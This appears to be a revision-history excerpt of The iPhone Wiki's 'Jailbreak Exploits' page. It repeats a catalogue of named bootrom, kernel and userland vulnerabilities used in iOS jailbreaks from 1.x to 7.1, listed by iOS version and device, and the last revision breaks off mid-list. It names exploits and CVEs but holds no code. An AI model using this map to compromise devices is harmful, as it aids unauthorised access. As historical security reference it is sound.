* [[limera1n]]'s bootrom exploit (Tethered jailbreak) on [[n88ap|iPhone 3GS]] with [[Bootrom 359.3.2|new bootrom]], [[iPhone 4]], and [[n81ap|iPod touch 4G]])<br />
* [[limera1n]]'s bootrom exploit + [[0x24000 Segment Overflow]] (together for [[untethered jailbreak]] on [[n88ap|iPhone 3GS]] with [[Bootrom 359.3|old bootrom]])<br />
* [[Symbolic Link Vulnerability]]<br />
* [[Timezone Vulnerability]]<br />
* [[Shebang Trick]]<br />
* [[AMFID code signing evasion]]<br />
* [[launchd.conf untether]]<br />
* [[IOUSBDeviceFamily Vulnerability]]<br />
* [[ARM Exception Vector Info Leak]]<br />
* [[dynamic memmove() locating]]<br />
* [[vm_map_copy_t corruption for arbitrary memory disclosure]]<br />
* [[kernel memory write via ROP gadget]]<br />
<br />
=== 6.1.3 / 6.1.4 / 6.1.5 / 6.1.6 ===<br />
[[Symbolic_Link_Vulnerability]] (Used by [[p0sixspwn]] to write to the file system in /var, also used in [[evasi0n]] and [[evasi0n7]])<br />
[[launchd.conf untether]]<br />
[[AMFID_code_signing_evasion]]<br />
[[posix_spawn kernel information leak]]<br />
<br />
== Exploits which are used in order to jailbreak 7.x ==<br />
=== 7.0 / 7.0.1 / 7.0.2 / 7.0.3 / 7.0.4 / 7.0.5 / 7.0.6 ===<br />
* [http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5133 CVE-2013-5133]<br />
* [http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1272 CVE-2014-1272]<br />
* [http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1273 CVE-2014-1273]<br />
* [http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3948 CVE-2013-3948]<br />
* [http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1278 CVE-2014-1278]<br />
<br />
=== 7.1 / 7.1.1 ===<br />
*[[limera1n]]'s bootrom exploit ([[Tethered jailbreak]]) on [[iPhone 4]]</div>
Ryandolan123
https://www.theiphonewiki.com/w/index.php?title=Jailbreak_Exploits&diff=41037
Jailbreak Exploits
2014-05-06T01:04:55Z
<p>Ryandolan123: oops, its p0sixspwn not p0sixpwn, sorry</p>
<hr />
<div>This page lists the exploits used in [[Jailbreak]]s.<br />
== Exploits which were used in order to jailbreak 1.x ==<br />
=== 1.0.2 ===<br />
* [[Restore Mode]] ([[iBoot (Bootloader)|iBoot]] had a command named cp, which had access to the whole filesystem)<br />
=== 1.1.1 ===<br />
* [[Symlinks]] (an upgrade jailbreak)<br />
* [[LibTiff|libtiff exploit]] (Adapted from the PSP scene, used by [[JailbreakMe]])<br />
=== 1.1.2 ===<br />
* [[Mknod]] (an upgrade jailbreak)<br />
=== 1.1.3 / 1.1.4 / 1.1.5 ===<br />
* [[Soft Upgrade]] (an upgrade jailbreak)<br />
* [[Ramdisk Hack]]<br />
* [[Dual Boot Exploit]] - Works up to [[iOS]] 2.0 beta 3<br />
* [[diags]] - Works up to [[iOS]] 2.0 beta 5<br />
<br />
== Exploits which are used in order to jailbreak 2.x ==<br />
=== 2.0 / 2.0.1 / 2.0.2 / 2.1 ===<br />
* [[Pwnage]] + [[Pwnage 2.0]]<br />
=== 2.1.1 ===<br />
* [[ARM7 Go]] ([[tethered jailbreak]])<br />
=== 2.2 ===<br />
* [[Pwnage]] + [[Pwnage 2.0]] ([[m68ap|iPhone]], [[n45ap|iPod touch]], and [[n82ap|iPhone 3G]])<br />
=== 2.2.1 ===<br />
* [[Pwnage]] + [[Pwnage 2.0]] ([[m68ap|iPhone]], [[n45ap|iPod touch]], and [[n82ap|iPhone 3G]])<br />
* [[0x24000 Segment Overflow]] + [[ARM7 Go]] (from iOS 2.1.1) ([[n72ap|iPod touch 2G]])<br />
<br />
== Exploits which are used in order to jailbreak 3.x ==<br />
=== 3.0 / 3.0.1 ===<br />
* [[Pwnage]] + [[Pwnage 2.0]] ([[m68ap|iPhone]], [[n45ap|iPod touch]], and [[n82ap|iPhone 3G]])<br />
* [[ARM7 Go]] (from iOS 2.1.1) + [[0x24000 Segment Overflow]] ( [[n72ap|iPod touch 2G]])<br />
* [[Pwnage]] + [[iBoot Environment Variable Overflow]] ([[m68ap|iPhone]], [[n45ap|iPod touch]], and [[n82ap|iPhone 3G]])<br />
* [[0x24000 Segment Overflow]] + [[iBoot Environment Variable Overflow]] ([[n72ap|iPod touch 2G]] and [[n88ap|iPhone 3GS]])<br />
=== 3.1 / 3.1.1 ===<br />
* [[Pwnage]] + [[Pwnage 2.0]] (together for [[untethered jailbreak]] on [[m68ap|iPhone]], [[n45ap|iPod touch]], and [[n82ap|iPhone 3G]])<br />
* [[usb_control_msg(0x21, 2) Exploit]] ([[tethered jailbreak]] on [[n72ap|iPod touch 2G]] [[Bootrom 240.5.1|new bootrom]], [[n88ap|iPhone 3GS]] [[Bootrom 359.3.2|new bootrom]], and [[n18ap|iPod touch 3G]])<br />
* [[0x24000 Segment Overflow]] + [[usb_control_msg(0x21, 2) Exploit]] ([[n72ap|iPod touch 2G]] [[Bootrom 240.4|old bootrom]] and [[n88ap|iPhone 3GS]] [[Bootrom 359.3|old bootrom]])<br />
=== 3.1.2 ===<br />
* [[Pwnage]] + [[Pwnage 2.0]] (together for [[untethered jailbreak]] on [[m68ap|iPhone]], [[n45ap|iPod touch]], and [[n82ap|iPhone 3G]])<br />
* [[usb_control_msg(0x21, 2) Exploit]] ([[tethered jailbreak]] on [[n72ap|iPod touch 2G]] [[Bootrom 240.5.1|new bootrom]], [[n88ap|iPhone 3GS]] [[Bootrom 359.3.2|new bootrom]], and [[n18ap|iPod touch 3G]])<br />
* [[0x24000 Segment Overflow]] + [[usb_control_msg(0x21, 2) Exploit]] ([[n72ap|iPod touch 2G]] [[Bootrom 240.4|old bootrom]] and [[n88ap|iPhone 3GS]] [[Bootrom 359.3|old bootrom]])<br />
* [[MobileBackup Copy Exploit]] + [[Incomplete Codesign Exploit]] + [[BPF_STX Kernel Write Exploit]] (all devices, used in [[Spirit]])<br />
* [[Malformed CFF Vulnerability]] + [[Incomplete Codesign Exploit]] + [[IOSurface Kernel Exploit]] (all devices, used in [[Star]])<br />
=== 3.1.3 ===<br />
* [[Pwnage]] + [[Pwnage 2.0]] (together for [[untethered jailbreak]] on [[m68ap|iPhone]], [[n45ap|iPod touch]], and [[n82ap|iPhone 3G]])<br />
* [[0x24000 Segment Overflow]] (for [[n72ap|iPod touch 2G]] and [[n88ap|iPhone 3GS]] devices with older bootroms)<br />
** + [[Limera1n Exploit]] ([[n88ap|iPhone 3GS]] [[Bootrom 359.3|old bootrom]], used in [[sn0wbreeze]])<br />
** + [[usb_control_msg(0xA1, 1) Exploit]] ([[n72ap|iPod touch 2G]] [[Bootrom 240.4|old bootrom]], used in [[sn0wbreeze]])<br />
* [[usb_control_msg(0xA1, 1) Exploit]]+ [[Incomplete Codesign Exploit]] + [[BPF_STX Kernel Write Exploit]] ([[n72ap|iPod touch 2G]] [[Bootrom 240.5.1|new bootrom]], used in [[sn0wbreeze]])<br />
* [[Limera1n Exploit]] + [[Incomplete Codesign Exploit]] + [[BPF_STX Kernel Write Exploit]] ([[N18ap|iPod touch 3G]] and [[n88ap|iPhone 3GS]] [[Bootrom 359.3.2|new bootrom]], used in [[sn0wbreeze]])<br />
* [[MobileBackup Copy Exploit]] + [[Incomplete Codesign Exploit]] + [[BPF_STX Kernel Write Exploit]] (all devices, used in [[Spirit]])<br />
* [[Malformed CFF Vulnerability]] + [[Incomplete Codesign Exploit]] + [[IOSurface Kernel Exploit]] (all devices, used in [[Star]])<br />
<br />
=== 3.2 ===<br />
* [[MobileBackup Copy Exploit]] + [[Incomplete Codesign Exploit]] + [[BPF_STX Kernel Write Exploit]] (all devices, used in [[Spirit]])<br />
* [[Malformed CFF Vulnerability]] + [[Incomplete Codesign Exploit]] + [[IOSurface Kernel Exploit]] ([[k48ap|iPad]], used in [[Star]])<br />
* [[Limera1n Exploit]] + [[Incomplete Codesign Exploit]] + [[BPF_STX Kernel Write Exploit]] ([[K48ap|iPad]] used in [[sn0wbreeze]] 2.9.x)<br />
=== 3.2.1 ===<br />
* [[Malformed CFF Vulnerability]] + [[Incomplete Codesign Exploit]] + [[IOSurface Kernel Exploit]] ([[k48ap|iPad]], used in [[Star]])<br />
* [[Limera1n Exploit]] + [[Incomplete Codesign Exploit]] + [[IOSurface Kernel Exploit]] ([[k48ap|iPad]], used in [[sn0wbreeze]] 2.9.x)<br />
=== 3.2.2 ===<br />
* [[Limera1n Exploit]] + [[Packet Filter Kernel Exploit]] ([[k48ap|iPad]])<br />
<br />
== Exploits which are used in order to jailbreak 4.x ==<br />
=== 4.0 / 4.0.1 ===<br />
* [[Pwnage]] + [[Pwnage 2.0]] ([[n82ap|iPhone 3G]])<br />
* [[0x24000 Segment Overflow]] ([[n72ap|iPod touch 2G]] and [[n88ap|iPhone 3GS]] devices with older bootroms)<br />
* [[Malformed CFF Vulnerability]] + [[Incomplete Codesign Exploit]] + [[IOSurface Kernel Exploit]] (all devices, used in [[Star]])<br />
* [[Limera1n Exploit]] + [[Packet Filter Kernel Exploit]] ([[n88ap|iPhone 3GS]] New bootrom, [[N18ap|iPod touch 3G]], [[n90ap|iPhone 4 (iPhone3,1)]])<br />
<br />
=== 4.0.2 ===<br />
* [[Pwnage]] + [[Pwnage 2.0]] ([[n82ap|iPhone 3G]])<br />
* [[ARM7 Go]] (from iOS 2.1.1) + [[0x24000 Segment Overflow]] ([[n72ap|iPod touch 2G]])<br />
* [[0x24000 Segment Overflow]] ([[n88ap|iPhone 3GS]])<br />
* [[limera1n]]'s bootrom exploit + [[Packet Filter Kernel Exploit]] ([[n88ap|iPhone 3GS]] [[Bootrom 359.3.2|new bootrom]], [[n18ap|iPod touch 3G]], [[n90ap|iPhone 4 (iPhone3,1)]], and [[n81ap|iPod touch 4G]])<br />
<br />
=== 4.1 ===<br />
* [[Pwnage]] + [[Pwnage 2.0]] (together to jailbreak the [[n82ap|iPhone 3G]])<br />
* [[ARM7 Go]] (from iOS 2.1.1) + [[0x24000 Segment Overflow]] (together for [[untethered jailbreak]] on [[n72ap|iPod touch 2G]] [[Bootrom 240.4|old bootrom]])<br />
* [[limera1n]]'s bootrom exploit + [[0x24000 Segment Overflow]] (together for [[untethered jailbreak]] on [[n88ap|iPhone 3GS]] [[Bootrom 359.3|old bootrom]])<br />
* [[limera1n]]'s bootrom exploit + [[Packet Filter Kernel Exploit]] (together for [[untethered jailbreak]] on [[n88ap|iPhone 3GS]] [[Bootrom 359.3.2|new bootrom]], [[n18ap|iPod touch 3G]], [[n90ap|iPhone 4 (iPhone3,1)]], [[n81ap|iPod touch 4G]], and [[k66ap|Apple TV 2G]]))<br />
* [[usb_control_msg(0xA1, 1) Exploit]] + [[Packet Filter Kernel Exploit]] (together for [[untethered jailbreak]] on [[n72ap|iPod touch 2G]])<br />
<br />
=== 4.2.1 ===<br />
* [[Pwnage]] + [[Pwnage 2.0]] (together to jailbreak the [[n82ap|iPhone 3G]])<br />
* [[ARM7 Go]] (from iOS 2.1.1) + [[0x24000 Segment Overflow]] (together for [[untethered jailbreak]] on [[n72ap|iPod touch 2G]] [[Bootrom 240.4|old bootrom]])<br />
* [[limera1n]]'s bootrom exploit + [[0x24000 Segment Overflow]] (together for [[untethered jailbreak]] on [[n88ap|iPhone 3GS]] [[Bootrom 359.3|old bootrom]])<br />
* [[limera1n]]'s bootrom exploit + [[HFS Legacy Volume Name Stack Buffer Overflow]] (together for [[untethered jailbreak]] on [[n88ap|iPhone 3GS]] [[Bootrom 359.3.2|new bootrom]], [[n18ap|iPod touch 3G]], [[k48ap|iPad]], [[n90ap|iPhone 4 (iPhone3,1)]], [[n81ap|iPod touch 4G]], and [[k66ap|Apple TV 2G]])<br />
* [[usb_control_msg(0xA1, 1) Exploit]] + [[HFS Legacy Volume Name Stack Buffer Overflow]] (together for [[untethered jailbreak]] on [[n72ap|iPod touch 2G]])<br />
<br />
=== 4.2.6 / 4.2.7 / 4.2.8 ===<br />
* [[limera1n]]'s bootrom exploit + [[HFS Legacy Volume Name Stack Buffer Overflow]] (together for [[untethered jailbreak]] on [[n92ap|iPhone 4 (iPhone3,3)]])<br />
* [[T1 Font Integer Overflow]] (used for [[Saffron]])<br />
<br />
=== 4.2.9 / 4.2.10 ===<br />
* [[limera1n]]'s bootrom exploit (Tethered jailbreak on [[n92ap|iPhone 4 (iPhone3,3)]])<br />
<br />
=== 4.3 ===<br />
* [[limera1n]]'s bootrom exploit + [[0x24000 Segment Overflow]] (together for [[untethered jailbreak]] on [[n88ap|iPhone 3GS]] [[Bootrom 359.3|old bootrom]])<br />
* [[limera1n]]'s bootrom exploit ([[tethered jailbreak]] on [[n88ap|iPhone 3GS]] [[Bootrom 359.3.2|new bootrom]], [[n18ap|iPod touch 3G]], [[k48ap|iPad]], [[n90ap|iPhone 4 (iPhone3,1)]], [[n81ap|iPod touch 4G]], and [[k66ap|Apple TV 2G]])<br />
* [[T1 Font Integer Overflow]] (used for [[Saffron]])<br />
<br />
=== 4.3.1 / 4.3.2 / 4.3.3 ===<br />
* [[limera1n]]'s bootrom exploit + [[0x24000 Segment Overflow]] (together for [[untethered jailbreak]] on [[n88ap|iPhone 3GS]] [[Bootrom 359.3|old bootrom]])<br />
* [[limera1n]]'s bootrom exploit + [[ndrv_setspec() Integer Overflow]] (together for [[untethered jailbreak]] on [[n88ap|iPhone 3GS]] [[Bootrom 359.3.2|new bootrom]], [[n18ap|iPod touch 3G]], [[k48ap|iPad]], [[n90ap|iPhone 4 (iPhone3,1)]], and [[n81ap|iPod touch 4G]])<br />
* [[T1 Font Integer Overflow]] (used for [[Saffron]])<br />
<br />
=== 4.3.4 / 4.3.5 ===<br />
* [[limera1n]]'s bootrom exploit + [[0x24000 Segment Overflow]] (together for [[untethered jailbreak]] on [[n88ap|iPhone 3GS]] with [[Bootrom 359.3|old bootrom]])<br />
* [[limera1n]]'s bootrom exploit (Tethered jailbreak) on [[n88ap|iPhone 3GS]] with [[Bootrom 359.3.2|new bootrom]], [[n18ap|iPod touch 3G]], [[k48ap|iPad]], [[n90ap|iPhone 4 (iPhone3,1)]], and [[n81ap|iPod touch 4G]])<br />
<br />
== Exploits which are used in order to jailbreak 5.x ==<br />
=== 5.0 ===<br />
* [[limera1n]]'s bootrom exploit + [[0x24000 Segment Overflow]] (together for [[untethered jailbreak]] on [[n88ap|iPhone 3GS]] with [[Bootrom 359.3|old bootrom]])<br />
* [[limera1n]]'s bootrom exploit (Tethered jailbreak) on [[n88ap|iPhone 3GS]] with [[Bootrom 359.3.2|new bootrom]], [[n18ap|iPod touch 3G]], [[k48ap|iPad]], [[iPhone 4]], and [[n81ap|iPod touch 4G]])<br />
* [[Racoon String Format Overflow Exploit]] (used both for payload injection and untether)+[[HFS Heap Overflow]]- [[n94ap|iPhone 4S]] only<br />
<br />
===5.0.1===<br />
* [[limera1n]]'s bootrom exploit + [[0x24000 Segment Overflow]] (together for [[untethered jailbreak]] on [[n88ap|iPhone 3GS]] with [[Bootrom 359.3|old bootrom]])<br />
* [[limera1n]]'s bootrom exploit + [[Racoon String Format Overflow Exploit]]+[[HFS Heap Overflow]] on [[n88ap|iPhone 3GS]] with [[Bootrom 359.3.2|new bootrom]], [[n18ap|iPod touch 3G]], [[k48ap|iPad]], [[iPhone 4]], and [[n81ap|iPod touch 4G]])<br />
* [[Racoon String Format Overflow Exploit]] (used both for payload injection and untether)+[[HFS Heap Overflow]] - [[iPad 2]] and [[iPhone 4S]] with [[Absinthe]]<br />
<br />
===5.1===<br />
* [[limera1n]]'s bootrom exploit (Tethered jailbreak) on [[n88ap|iPhone 3GS]] with [[Bootrom 359.3.2|new bootrom]], [[n18ap|iPod touch 3G]], [[k48ap|iPad]], [[iPhone 4]], and [[n81ap|iPod touch 4G]])<br />
* [[limera1n]]'s bootrom exploit + [[0x24000 Segment Overflow]] (together for [[untethered jailbreak]] on [[n88ap|iPhone 3GS]] with [[Bootrom 359.3|old bootrom]])<br />
<br />
===5.1.1===<br />
* [[limera1n Exploit]] + [[0x24000 Segment Overflow]] (together for [[untethered jailbreak]] on [[n88ap|iPhone 3GS]] with [[Bootrom 359.3|old bootrom]])<br />
* [[limera1n Exploit]] + [[Rocky Racoon]] (together for [[untethered jailbreak]] on [[n88ap|iPhone 3GS]] with [[Bootrom 359.3.2|new bootrom]], [[iPhone 4]], [[n18ap|iPod touch 3G]], and [[n81ap|iPod touch 4G]])<br />
<br />
== Exploits which are used in order to jailbreak 6.x ==<br />
=== 6.0 / 6.0.1 / 6.0.2 / 6.1 / 6.1.1 / 6.1.2 ===<br />
* [[limera1n]]'s bootrom exploit (Tethered jailbreak) on [[n88ap|iPhone 3GS]] with [[Bootrom 359.3.2|new bootrom]], [[iPhone 4]], and [[n81ap|iPod touch 4G]])<br />
* [[limera1n]]'s bootrom exploit + [[0x24000 Segment Overflow]] (together for [[untethered jailbreak]] on [[n88ap|iPhone 3GS]] with [[Bootrom 359.3|old bootrom]])<br />
* [[Symbolic Link Vulnerability]]<br />
* [[Timezone Vulnerability]]<br />
* [[Shebang Trick]]<br />
* [[AMFID code signing evasion]]<br />
* [[launchd.conf untether]]<br />
* [[IOUSBDeviceFamily Vulnerability]]<br />
* [[ARM Exception Vector Info Leak]]<br />
* [[dynamic memmove() locating]]<br />
* [[vm_map_copy_t corruption for arbitrary memory disclosure]]<br />
* [[kernel memory write via ROP gadget]]<br />
<br />
=== 6.1.3 / 6.1.4 / 6.1.5 / 6.1.6 ===<br />
[[Symbolic_Link_Vulnerability]] (Used by [[p0sixspwn]] to write to the file system in /var, also used in [[evasi0n]] and [[evasi0n7]])<br />
<br />
== Exploits which are used in order to jailbreak 7.x ==<br />
=== 7.0 / 7.0.1 / 7.0.2 / 7.0.3 / 7.0.4 / 7.0.5 / 7.0.6 ===<br />
* [http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5133 CVE-2013-5133]<br />
* [http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1272 CVE-2014-1272]<br />
* [http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1273 CVE-2014-1273]<br />
* [http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3948 CVE-2013-3948]<br />
* [http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1278 CVE-2014-1278]<br />
<br />
=== 7.1 / 7.1.1 ===<br />
*[[limera1n]]'s bootrom exploit ([[Tethered jailbreak]]) on [[iPhone 4]]</div>
Ryandolan123
https://www.theiphonewiki.com/w/index.php?title=Jailbreak_Exploits&diff=41036
Jailbreak Exploits
2014-05-06T01:04:00Z
<p>Ryandolan123: /* 6.1.3 / 6.1.4 / 6.1.5 / 6.1.6 */</p>
<hr />
<div>This page lists the exploits used in [[Jailbreak]]s.<br />
== Exploits which were used in order to jailbreak 1.x ==<br />
=== 1.0.2 ===<br />
* [[Restore Mode]] ([[iBoot (Bootloader)|iBoot]] had a command named cp, which had access to the whole filesystem)<br />
=== 1.1.1 ===<br />
* [[Symlinks]] (an upgrade jailbreak)<br />
* [[LibTiff|libtiff exploit]] (Adapted from the PSP scene, used by [[JailbreakMe]])<br />
=== 1.1.2 ===<br />
* [[Mknod]] (an upgrade jailbreak)<br />
=== 1.1.3 / 1.1.4 / 1.1.5 ===<br />
* [[Soft Upgrade]] (an upgrade jailbreak)<br />
* [[Ramdisk Hack]]<br />
* [[Dual Boot Exploit]] - Works up to [[iOS]] 2.0 beta 3<br />
* [[diags]] - Works up to [[iOS]] 2.0 beta 5<br />
<br />
== Exploits which are used in order to jailbreak 2.x ==<br />
=== 2.0 / 2.0.1 / 2.0.2 / 2.1 ===<br />
* [[Pwnage]] + [[Pwnage 2.0]]<br />
=== 2.1.1 ===<br />
* [[ARM7 Go]] ([[tethered jailbreak]])<br />
=== 2.2 ===<br />
* [[Pwnage]] + [[Pwnage 2.0]] ([[m68ap|iPhone]], [[n45ap|iPod touch]], and [[n82ap|iPhone 3G]])<br />
=== 2.2.1 ===<br />
* [[Pwnage]] + [[Pwnage 2.0]] ([[m68ap|iPhone]], [[n45ap|iPod touch]], and [[n82ap|iPhone 3G]])<br />
* [[0x24000 Segment Overflow]] + [[ARM7 Go]] (from iOS 2.1.1) ([[n72ap|iPod touch 2G]])<br />
<br />
== Exploits which are used in order to jailbreak 3.x ==<br />
=== 3.0 / 3.0.1 ===<br />
* [[Pwnage]] + [[Pwnage 2.0]] ([[m68ap|iPhone]], [[n45ap|iPod touch]], and [[n82ap|iPhone 3G]])<br />
* [[ARM7 Go]] (from iOS 2.1.1) + [[0x24000 Segment Overflow]] ( [[n72ap|iPod touch 2G]])<br />
* [[Pwnage]] + [[iBoot Environment Variable Overflow]] ([[m68ap|iPhone]], [[n45ap|iPod touch]], and [[n82ap|iPhone 3G]])<br />
* [[0x24000 Segment Overflow]] + [[iBoot Environment Variable Overflow]] ([[n72ap|iPod touch 2G]] and [[n88ap|iPhone 3GS]])<br />
=== 3.1 / 3.1.1 ===<br />
* [[Pwnage]] + [[Pwnage 2.0]] (together for [[untethered jailbreak]] on [[m68ap|iPhone]], [[n45ap|iPod touch]], and [[n82ap|iPhone 3G]])<br />
* [[usb_control_msg(0x21, 2) Exploit]] ([[tethered jailbreak]] on [[n72ap|iPod touch 2G]] [[Bootrom 240.5.1|new bootrom]], [[n88ap|iPhone 3GS]] [[Bootrom 359.3.2|new bootrom]], and [[n18ap|iPod touch 3G]])<br />
* [[0x24000 Segment Overflow]] + [[usb_control_msg(0x21, 2) Exploit]] ([[n72ap|iPod touch 2G]] [[Bootrom 240.4|old bootrom]] and [[n88ap|iPhone 3GS]] [[Bootrom 359.3|old bootrom]])<br />
=== 3.1.2 ===<br />
* [[Pwnage]] + [[Pwnage 2.0]] (together for [[untethered jailbreak]] on [[m68ap|iPhone]], [[n45ap|iPod touch]], and [[n82ap|iPhone 3G]])<br />
* [[usb_control_msg(0x21, 2) Exploit]] ([[tethered jailbreak]] on [[n72ap|iPod touch 2G]] [[Bootrom 240.5.1|new bootrom]], [[n88ap|iPhone 3GS]] [[Bootrom 359.3.2|new bootrom]], and [[n18ap|iPod touch 3G]])<br />
* [[0x24000 Segment Overflow]] + [[usb_control_msg(0x21, 2) Exploit]] ([[n72ap|iPod touch 2G]] [[Bootrom 240.4|old bootrom]] and [[n88ap|iPhone 3GS]] [[Bootrom 359.3|old bootrom]])<br />
* [[MobileBackup Copy Exploit]] + [[Incomplete Codesign Exploit]] + [[BPF_STX Kernel Write Exploit]] (all devices, used in [[Spirit]])<br />
* [[Malformed CFF Vulnerability]] + [[Incomplete Codesign Exploit]] + [[IOSurface Kernel Exploit]] (all devices, used in [[Star]])<br />
=== 3.1.3 ===<br />
* [[Pwnage]] + [[Pwnage 2.0]] (together for [[untethered jailbreak]] on [[m68ap|iPhone]], [[n45ap|iPod touch]], and [[n82ap|iPhone 3G]])<br />
* [[0x24000 Segment Overflow]] (for [[n72ap|iPod touch 2G]] and [[n88ap|iPhone 3GS]] devices with older bootroms)<br />
** + [[Limera1n Exploit]] ([[n88ap|iPhone 3GS]] [[Bootrom 359.3|old bootrom]], used in [[sn0wbreeze]])<br />
** + [[usb_control_msg(0xA1, 1) Exploit]] ([[n72ap|iPod touch 2G]] [[Bootrom 240.4|old bootrom]], used in [[sn0wbreeze]])<br />
* [[usb_control_msg(0xA1, 1) Exploit]]+ [[Incomplete Codesign Exploit]] + [[BPF_STX Kernel Write Exploit]] ([[n72ap|iPod touch 2G]] [[Bootrom 240.5.1|new bootrom]], used in [[sn0wbreeze]])<br />
* [[Limera1n Exploit]] + [[Incomplete Codesign Exploit]] + [[BPF_STX Kernel Write Exploit]] ([[N18ap|iPod touch 3G]] and [[n88ap|iPhone 3GS]] [[Bootrom 359.3.2|new bootrom]], used in [[sn0wbreeze]])<br />
* [[MobileBackup Copy Exploit]] + [[Incomplete Codesign Exploit]] + [[BPF_STX Kernel Write Exploit]] (all devices, used in [[Spirit]])<br />
* [[Malformed CFF Vulnerability]] + [[Incomplete Codesign Exploit]] + [[IOSurface Kernel Exploit]] (all devices, used in [[Star]])<br />
<br />
=== 3.2 ===<br />
* [[MobileBackup Copy Exploit]] + [[Incomplete Codesign Exploit]] + [[BPF_STX Kernel Write Exploit]] (all devices, used in [[Spirit]])<br />
* [[Malformed CFF Vulnerability]] + [[Incomplete Codesign Exploit]] + [[IOSurface Kernel Exploit]] ([[k48ap|iPad]], used in [[Star]])<br />
* [[Limera1n Exploit]] + [[Incomplete Codesign Exploit]] + [[BPF_STX Kernel Write Exploit]] ([[K48ap|iPad]] used in [[sn0wbreeze]] 2.9.x)<br />
=== 3.2.1 ===<br />
* [[Malformed CFF Vulnerability]] + [[Incomplete Codesign Exploit]] + [[IOSurface Kernel Exploit]] ([[k48ap|iPad]], used in [[Star]])<br />
* [[Limera1n Exploit]] + [[Incomplete Codesign Exploit]] + [[IOSurface Kernel Exploit]] ([[k48ap|iPad]], used in [[sn0wbreeze]] 2.9.x)<br />
=== 3.2.2 ===<br />
* [[Limera1n Exploit]] + [[Packet Filter Kernel Exploit]] ([[k48ap|iPad]])<br />
<br />
== Exploits which are used in order to jailbreak 4.x ==<br />
=== 4.0 / 4.0.1 ===<br />
* [[Pwnage]] + [[Pwnage 2.0]] ([[n82ap|iPhone 3G]])<br />
* [[0x24000 Segment Overflow]] ([[n72ap|iPod touch 2G]] and [[n88ap|iPhone 3GS]] devices with older bootroms)<br />
* [[Malformed CFF Vulnerability]] + [[Incomplete Codesign Exploit]] + [[IOSurface Kernel Exploit]] (all devices, used in [[Star]])<br />
* [[Limera1n Exploit]] + [[Packet Filter Kernel Exploit]] ([[n88ap|iPhone 3GS]] New bootrom, [[N18ap|iPod touch 3G]], [[n90ap|iPhone 4 (iPhone3,1)]])<br />
<br />
=== 4.0.2 ===<br />
* [[Pwnage]] + [[Pwnage 2.0]] ([[n82ap|iPhone 3G]])<br />
* [[ARM7 Go]] (from iOS 2.1.1) + [[0x24000 Segment Overflow]] ([[n72ap|iPod touch 2G]])<br />
* [[0x24000 Segment Overflow]] ([[n88ap|iPhone 3GS]])<br />
* [[limera1n]]'s bootrom exploit + [[Packet Filter Kernel Exploit]] ([[n88ap|iPhone 3GS]] [[Bootrom 359.3.2|new bootrom]], [[n18ap|iPod touch 3G]], [[n90ap|iPhone 4 (iPhone3,1)]], and [[n81ap|iPod touch 4G]])<br />
<br />
=== 4.1 ===<br />
* [[Pwnage]] + [[Pwnage 2.0]] (together to jailbreak the [[n82ap|iPhone 3G]])<br />
* [[ARM7 Go]] (from iOS 2.1.1) + [[0x24000 Segment Overflow]] (together for [[untethered jailbreak]] on [[n72ap|iPod touch 2G]] [[Bootrom 240.4|old bootrom]])<br />
* [[limera1n]]'s bootrom exploit + [[0x24000 Segment Overflow]] (together for [[untethered jailbreak]] on [[n88ap|iPhone 3GS]] [[Bootrom 359.3|old bootrom]])<br />
* [[limera1n]]'s bootrom exploit + [[Packet Filter Kernel Exploit]] (together for [[untethered jailbreak]] on [[n88ap|iPhone 3GS]] [[Bootrom 359.3.2|new bootrom]], [[n18ap|iPod touch 3G]], [[n90ap|iPhone 4 (iPhone3,1)]], [[n81ap|iPod touch 4G]], and [[k66ap|Apple TV 2G]]))<br />
* [[usb_control_msg(0xA1, 1) Exploit]] + [[Packet Filter Kernel Exploit]] (together for [[untethered jailbreak]] on [[n72ap|iPod touch 2G]])<br />
<br />
=== 4.2.1 ===<br />
* [[Pwnage]] + [[Pwnage 2.0]] (together to jailbreak the [[n82ap|iPhone 3G]])<br />
* [[ARM7 Go]] (from iOS 2.1.1) + [[0x24000 Segment Overflow]] (together for [[untethered jailbreak]] on [[n72ap|iPod touch 2G]] [[Bootrom 240.4|old bootrom]])<br />
* [[limera1n]]'s bootrom exploit + [[0x24000 Segment Overflow]] (together for [[untethered jailbreak]] on [[n88ap|iPhone 3GS]] [[Bootrom 359.3|old bootrom]])<br />
* [[limera1n]]'s bootrom exploit + [[HFS Legacy Volume Name Stack Buffer Overflow]] (together for [[untethered jailbreak]] on [[n88ap|iPhone 3GS]] [[Bootrom 359.3.2|new bootrom]], [[n18ap|iPod touch 3G]], [[k48ap|iPad]], [[n90ap|iPhone 4 (iPhone3,1)]], [[n81ap|iPod touch 4G]], and [[k66ap|Apple TV 2G]])<br />
* [[usb_control_msg(0xA1, 1) Exploit]] + [[HFS Legacy Volume Name Stack Buffer Overflow]] (together for [[untethered jailbreak]] on [[n72ap|iPod touch 2G]])<br />
<br />
=== 4.2.6 / 4.2.7 / 4.2.8 ===<br />
* [[limera1n]]'s bootrom exploit + [[HFS Legacy Volume Name Stack Buffer Overflow]] (together for [[untethered jailbreak]] on [[n92ap|iPhone 4 (iPhone3,3)]])<br />
* [[T1 Font Integer Overflow]] (used for [[Saffron]])<br />
<br />
=== 4.2.9 / 4.2.10 ===<br />
* [[limera1n]]'s bootrom exploit (Tethered jailbreak on [[n92ap|iPhone 4 (iPhone3,3)]])<br />
<br />
=== 4.3 ===<br />
* [[limera1n]]'s bootrom exploit + [[0x24000 Segment Overflow]] (together for [[untethered jailbreak]] on [[n88ap|iPhone 3GS]] [[Bootrom 359.3|old bootrom]])<br />
* [[limera1n]]'s bootrom exploit ([[tethered jailbreak]] on [[n88ap|iPhone 3GS]] [[Bootrom 359.3.2|new bootrom]], [[n18ap|iPod touch 3G]], [[k48ap|iPad]], [[n90ap|iPhone 4 (iPhone3,1)]], [[n81ap|iPod touch 4G]], and [[k66ap|Apple TV 2G]])<br />
* [[T1 Font Integer Overflow]] (used for [[Saffron]])<br />
<br />
=== 4.3.1 / 4.3.2 / 4.3.3 ===<br />
